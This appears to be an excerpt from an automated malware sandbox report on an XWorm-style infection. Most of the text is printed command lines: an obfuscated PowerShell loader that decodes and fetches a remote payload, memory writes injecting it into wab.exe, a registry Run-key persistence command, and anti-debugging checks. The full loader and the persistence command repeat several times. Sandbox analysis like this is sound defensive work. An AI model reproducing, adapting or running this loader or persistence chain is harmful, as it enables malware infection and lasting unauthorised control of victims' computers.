              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4585Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5303Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6231Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3546Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4409Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5359Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1660Thread sleep count: 6231 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 516Thread sleep count: 3546 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6912Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4116Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 316Thread sleep time: -23980767295822402s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5368Thread sleep count: 4409 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5368Thread sleep count: 5359 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 0000000A.00000002.1922709973.0000024B6C800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWEv^
              Source: wab.exe, 00000013.00000002.2542507637.00000000079D7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000002.2542507637.0000000007A35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wab.exe, 00000013.00000002.2542507637.0000000007A19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02AFD6F8 LdrInitializeThunk,LdrInitializeThunk,14_2_02AFD6F8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_4788.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4788, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4040, type: MEMORYSTR
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4470000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2FDFFE8Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$autarkically189 = 1;$indgangssignaletnstruktionsbger='sub';$indgangssignaletnstruktionsbger+='strin';$indgangssignaletnstruktionsbger+='g';function quadmeter($dopingsigtet){$dumpeprocenter=$dopingsigtet.length-$autarkically189;for($indgangssignalet=5;$indgangssignalet -lt $dumpeprocenter;$indgangssignalet+=6){$forlys+=$dopingsigtet.$indgangssignaletnstruktionsbger.invoke( $indgangssignalet, $autarkically189);}$forlys;}function flaprer($caissoned){& ($sopites) ($caissoned);}$generalisternes=quadmeter 'pylorm edto ,ildzi raeima oel uerhl falsahejka/timia5 l ft.gar,e0andro k,rre(m.ckew,evaaisvinenanti.dlandgo fluewskalksgarnn oraclnjapontyoudi gr,ni1codd 0unde,.s ick0tilkr;event bistw joinicontrn .chw6 hrin4s,vsu;hapte seg exrende6gaine4prebl;j.mps pu prboligv fort: edu.1 hete2 cure1vomme.mona.0a.pel)omber vra.tg trafe her.cg,laxkmonisohensl/unsea2foeta0dekup1wares0 udpl0redes1bepow0muted1slapp .raktfplaitifuskerkentoe ba,rf tra,outrovxvedes/ anda1utilf2 damp1 trid.bus,i0ilixa ';$lifeblood=quadmeter 'folkeucroo s mercebestyrsulmu-klimaagul bganecdeslut,nprotot luma ';$postfrontal=quadmeter 'ca dihvaabetd llat.unktpsf.rbs ndve:hjlan/broo / rickrcatkiacors,noverlct,enehpatruot,ldebsupero pol.sfrembcdickealecitr sv.ndlatheistyktnfilmo.sweepcshaveo s pemcapit.pollybkulbrrsvend/me.alcsk,ttsnasc /hupa.runex renangk refontas eo jugeg haneleva,geignitrp ntenf,rdreforst.a gotakinetsakkordbrug, ';$uninnocuous=quadmeter 'kundg>provi ';$sopites=quadmeter ',ablei realeprespxte,ef ';$sorteringsmulighederne='exclusion';$opkaldsprisen = quadmeter 'se.arenoteacoprejhjovasoleann bem r%biofead strp stutp kvieddin oa kurit unscaman,e% kono\oluffatraf k aareeundernisopyb ,kikocererlunderdtindi.missius,ilnd ,nntf enta pos r&plasm& proc m,rateo erpcprotohunmeeod zzi hres.thavmi ';flaprer (quadmeter ' blus$urgeng gerulfryseo lempb frdials lulan gg:sta,smbras,ascombrdoedsi juleayndlin acroe udso=drukk(kolp,cwap,emtomatdtr.ll unris/ch ckc exto visib$un eromag,rplinjekentraaoverfl ,hardfulnes rtepcodesrre rnibeloesterraexylopnbr.es)sikke ');flaprer (quadmeter 'beund$ophiug baptlfissio o dlbudfaka.ordblwangl: embisvetkotstnkso.rimeopellenmediz= rver$ metopproteo parks emantioannfunsierc.nfioro ernskotjtbistiaklimalorico. bisis nhidp opbel frigi stiltscamb( tale$insecualternknapbiultran urunnrefrao e accrd.hau inalogoo,eusagitsarbut)sickl ');$postfrontal=$stoon[0];$prespakket= (quadmeter 'blegs$ woengbicyclnarkoonon.ubvagotafald.lsingu:v.jrsh g ggumillicunmedkextrisartictecchae bul.r prece predrouthu=loneynto.sieorthowperfe-pigeooandalbsu.jejdrastefrigrcoracutfntrr bss.sproctydeckhswhimbtcetaneembramle,be.acapnnkubeuebr kvtpost . genewnondeesu,nobhelhec h melplaniikrisee xylon rist');$prespakket+=$mariane[1];flaprer ($prespakket);flaprer (quadmeter ' vato$ shelhpierlu emmecduks kkbsprs g ostraf ie ,erirsan.eeme osrptose. slath striehundraforgadsp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$autarkically189 = 1;$indgangssignaletnstruktionsbger='sub';$indgangssignaletnstruktionsbger+='strin';$indgangssignaletnstruktionsbger+='g';function quadmeter($dopingsigtet){$dumpeprocenter=$dopingsigtet.length-$autarkically189;for($indgangssignalet=5;$indgangssignalet -lt $dumpeprocenter;$indgangssignalet+=6){$forlys+=$dopingsigtet.$indgangssignaletnstruktionsbger.invoke( $indgangssignalet, $autarkically189);}$forlys;}function flaprer($caissoned){& ($sopites) ($caissoned);}$generalisternes=quadmeter 'pylorm edto ,ildzi raeima oel uerhl falsahejka/timia5 l ft.gar,e0andro k,rre(m.ckew,evaaisvinenanti.dlandgo fluewskalksgarnn oraclnjapontyoudi gr,ni1codd 0unde,.s ick0tilkr;event bistw joinicontrn .chw6 hrin4s,vsu;hapte seg exrende6gaine4prebl;j.mps pu prboligv fort: edu.1 hete2 cure1vomme.mona.0a.pel)omber vra.tg trafe her.cg,laxkmonisohensl/unsea2foeta0dekup1wares0 udpl0redes1bepow0muted1slapp .raktfplaitifuskerkentoe ba,rf tra,outrovxvedes/ anda1utilf2 damp1 trid.bus,i0ilixa ';$lifeblood=quadmeter 'folkeucroo s mercebestyrsulmu-klimaagul bganecdeslut,nprotot luma ';$postfrontal=quadmeter 'ca dihvaabetd llat.unktpsf.rbs ndve:hjlan/broo / rickrcatkiacors,noverlct,enehpatruot,ldebsupero pol.sfrembcdickealecitr sv.ndlatheistyktnfilmo.sweepcshaveo s pemcapit.pollybkulbrrsvend/me.alcsk,ttsnasc /hupa.runex renangk refontas eo jugeg haneleva,geignitrp ntenf,rdreforst.a gotakinetsakkordbrug, ';$uninnocuous=quadmeter 'kundg>provi ';$sopites=quadmeter ',ablei realeprespxte,ef ';$sorteringsmulighederne='exclusion';$opkaldsprisen = quadmeter 'se.arenoteacoprejhjovasoleann bem r%biofead strp stutp kvieddin oa kurit unscaman,e% kono\oluffatraf k aareeundernisopyb ,kikocererlunderdtindi.missius,ilnd ,nntf enta pos r&plasm& proc m,rateo erpcprotohunmeeod zzi hres.thavmi ';flaprer (quadmeter ' blus$urgeng gerulfryseo lempb frdials lulan gg:sta,smbras,ascombrdoedsi juleayndlin acroe udso=drukk(kolp,cwap,emtomatdtr.ll unris/ch ckc exto visib$un eromag,rplinjekentraaoverfl ,hardfulnes rtepcodesrre rnibeloesterraexylopnbr.es)sikke ');flaprer (quadmeter 'beund$ophiug baptlfissio o dlbudfaka.ordblwangl: embisvetkotstnkso.rimeopellenmediz= rver$ metopproteo parks emantioannfunsierc.nfioro ernskotjtbistiaklimalorico. bisis nhidp opbel frigi stiltscamb( tale$insecualternknapbiultran urunnrefrao e accrd.hau inalogoo,eusagitsarbut)sickl ');$postfrontal=$stoon[0];$prespakket= (quadmeter 'blegs$ woengbicyclnarkoonon.ubvagotafald.lsingu:v.jrsh g ggumillicunmedkextrisartictecchae bul.r prece predrouthu=loneynto.sieorthowperfe-pigeooandalbsu.jejdrastefrigrcoracutfntrr bss.sproctydeckhswhimbtcetaneembramle,be.acapnnkubeuebr kvtpost . genewnondeesu,nobhelhec h melplaniikrisee xylon rist');$prespakket+=$mariane[1];flaprer ($prespakket);flaprer (quadmeter ' vato$ shelhpierlu emmecduks kkbsprs g ostraf ie ,erirsan.eeme osrptose. slath striehundraforgadsp
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%forringens% -w 1 $kettledrummer=(get-itemproperty -path 'hkcu:\unsliding\').warmnesses;%forringens% ($kettledrummer)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$autarkically189 = 1;$indgangssignaletnstruktionsbger='sub';$indgangssignaletnstruktionsbger+='strin';$indgangssignaletnstruktionsbger+='g';function quadmeter($dopingsigtet){$dumpeprocenter=$dopingsigtet.length-$autarkically189;for($indgangssignalet=5;$indgangssignalet -lt $dumpeprocenter;$indgangssignalet+=6){$forlys+=$dopingsigtet.$indgangssignaletnstruktionsbger.invoke( $indgangssignalet, $autarkically189);}$forlys;}function flaprer($caissoned){& ($sopites) ($caissoned);}$generalisternes=quadmeter 'pylorm edto ,ildzi raeima oel uerhl falsahejka/timia5 l ft.gar,e0andro k,rre(m.ckew,evaaisvinenanti.dlandgo fluewskalksgarnn oraclnjapontyoudi gr,ni1codd 0unde,.s ick0tilkr;event bistw joinicontrn .chw6 hrin4s,vsu;hapte seg exrende6gaine4prebl;j.mps pu prboligv fort: edu.1 hete2 cure1vomme.mona.0a.pel)omber vra.tg trafe her.cg,laxkmonisohensl/unsea2foeta0dekup1wares0 udpl0redes1bepow0muted1slapp .raktfplaitifuskerkentoe ba,rf tra,outrovxvedes/ anda1utilf2 damp1 trid.bus,i0ilixa ';$lifeblood=quadmeter 'folkeucroo s mercebestyrsulmu-klimaagul bganecdeslut,nprotot luma ';$postfrontal=quadmeter 'ca dihvaabetd llat.unktpsf.rbs ndve:hjlan/broo / rickrcatkiacors,noverlct,enehpatruot,ldebsupero pol.sfrembcdickealecitr sv.ndlatheistyktnfilmo.sweepcshaveo s pemcapit.pollybkulbrrsvend/me.alcsk,ttsnasc /hupa.runex renangk refontas eo jugeg haneleva,geignitrp ntenf,rdreforst.a gotakinetsakkordbrug, ';$uninnocuous=quadmeter 'kundg>provi ';$sopites=quadmeter ',ablei realeprespxte,ef ';$sorteringsmulighederne='exclusion';$opkaldsprisen = quadmeter 'se.arenoteacoprejhjovasoleann bem r%biofead strp stutp kvieddin oa kurit unscaman,e% kono\oluffatraf k aareeundernisopyb ,kikocererlunderdtindi.missius,ilnd ,nntf enta pos r&plasm& proc m,rateo erpcprotohunmeeod zzi hres.thavmi ';flaprer (quadmeter ' blus$urgeng gerulfryseo lempb frdials lulan gg:sta,smbras,ascombrdoedsi juleayndlin acroe udso=drukk(kolp,cwap,emtomatdtr.ll unris/ch ckc exto visib$un eromag,rplinjekentraaoverfl ,hardfulnes rtepcodesrre rnibeloesterraexylopnbr.es)sikke ');flaprer (quadmeter 'beund$ophiug baptlfissio o dlbudfaka.ordblwangl: embisvetkotstnkso.rimeopellenmediz= rver$ metopproteo parks emantioannfunsierc.nfioro ernskotjtbistiaklimalorico. bisis nhidp opbel frigi stiltscamb( tale$insecualternknapbiultran urunnrefrao e accrd.hau inalogoo,eusagitsarbut)sickl ');$postfrontal=$stoon[0];$prespakket= (quadmeter 'blegs$ woengbicyclnarkoonon.ubvagotafald.lsingu:v.jrsh g ggumillicunmedkextrisartictecchae bul.r prece predrouthu=loneynto.sieorthowperfe-pigeooandalbsu.jejdrastefrigrcoracutfntrr bss.sproctydeckhswhimbtcetaneembramle,be.acapnnkubeuebr kvtpost . genewnondeesu,nobhelhec h melplaniikrisee xylon rist');$prespakket+=$mariane[1];flaprer ($prespakket);flaprer (quadmeter ' vato$ shelhpierlu emmecduks kkbsprs g ostraf ie ,erirsan.eeme osrptose. slath striehundraforgadspJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$autarkically189 = 1;$indgangssignaletnstruktionsbger='sub';$indgangssignaletnstruktionsbger+='strin';$indgangssignaletnstruktionsbger+='g';function quadmeter($dopingsigtet){$dumpeprocenter=$dopingsigtet.length-$autarkically189;for($indgangssignalet=5;$indgangssignalet -lt $dumpeprocenter;$indgangssignalet+=6){$forlys+=$dopingsigtet.$indgangssignaletnstruktionsbger.invoke( $indgangssignalet, $autarkically189);}$forlys;}function flaprer($caissoned){& ($sopites) ($caissoned);}$generalisternes=quadmeter 'pylorm edto ,ildzi raeima oel uerhl falsahejka/timia5 l ft.gar,e0andro k,rre(m.ckew,evaaisvinenanti.dlandgo fluewskalksgarnn oraclnjapontyoudi gr,ni1codd 0unde,.s ick0tilkr;event bistw joinicontrn .chw6 hrin4s,vsu;hapte seg exrende6gaine4prebl;j.mps pu prboligv fort: edu.1 hete2 cure1vomme.mona.0a.pel)omber vra.tg trafe her.cg,laxkmonisohensl/unsea2foeta0dekup1wares0 udpl0redes1bepow0muted1slapp .raktfplaitifuskerkentoe ba,rf tra,outrovxvedes/ anda1utilf2 damp1 trid.bus,i0ilixa ';$lifeblood=quadmeter 'folkeucroo s mercebestyrsulmu-klimaagul bganecdeslut,nprotot luma ';$postfrontal=quadmeter 'ca dihvaabetd llat.unktpsf.rbs ndve:hjlan/broo / rickrcatkiacors,noverlct,enehpatruot,ldebsupero pol.sfrembcdickealecitr sv.ndlatheistyktnfilmo.sweepcshaveo s pemcapit.pollybkulbrrsvend/me.alcsk,ttsnasc /hupa.runex renangk refontas eo jugeg haneleva,geignitrp ntenf,rdreforst.a gotakinetsakkordbrug, ';$uninnocuous=quadmeter 'kundg>provi ';$sopites=quadmeter ',ablei realeprespxte,ef ';$sorteringsmulighederne='exclusion';$opkaldsprisen = quadmeter 'se.arenoteacoprejhjovasoleann bem r%biofead strp stutp kvieddin oa kurit unscaman,e% kono\oluffatraf k aareeundernisopyb ,kikocererlunderdtindi.missius,ilnd ,nntf enta pos r&plasm& proc m,rateo erpcprotohunmeeod zzi hres.thavmi ';flaprer (quadmeter ' blus$urgeng gerulfryseo lempb frdials lulan gg:sta,smbras,ascombrdoedsi juleayndlin acroe udso=drukk(kolp,cwap,emtomatdtr.ll unris/ch ckc exto visib$un eromag,rplinjekentraaoverfl ,hardfulnes rtepcodesrre rnibeloesterraexylopnbr.es)sikke ');flaprer (quadmeter 'beund$ophiug baptlfissio o dlbudfaka.ordblwangl: embisvetkotstnkso.rimeopellenmediz= rver$ metopproteo parks emantioannfunsierc.nfioro ernskotjtbistiaklimalorico. bisis nhidp opbel frigi stiltscamb( tale$insecualternknapbiultran urunnrefrao e accrd.hau inalogoo,eusagitsarbut)sickl ');$postfrontal=$stoon[0];$prespakket= (quadmeter 'blegs$ woengbicyclnarkoonon.ubvagotafald.lsingu:v.jrsh g ggumillicunmedkextrisartictecchae bul.r prece predrouthu=loneynto.sieorthowperfe-pigeooandalbsu.jejdrastefrigrcoracutfntrr bss.sproctydeckhswhimbtcetaneembramle,be.acapnnkubeuebr kvtpost . genewnondeesu,nobhelhec h melplaniikrisee xylon rist');$prespakket+=$mariane[1];flaprer ($prespakket);flaprer (quadmeter ' vato$ shelhpierlu emmecduks kkbsprs g ostraf ie ,erirsan.eeme osrptose. slath striehundraforgadspJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%forringens% -w 1 $kettledrummer=(get-itemproperty -path 'hkcu:\unsliding\').warmnesses;%forringens% ($kettledrummer)"Jump to behavior
              Source: wab.exe, 00000013.00000002.2566248537.0000000023CC5000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000013.00000002.2566248537.0000000023A79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: wab.exe, 00000013.00000002.2566248537.0000000023CC5000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000013.00000002.2566248537.0000000023A79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
              Source: wab.exe, 00000013.00000002.2566248537.0000000023CC5000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000013.00000002.2566248537.0000000023A79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
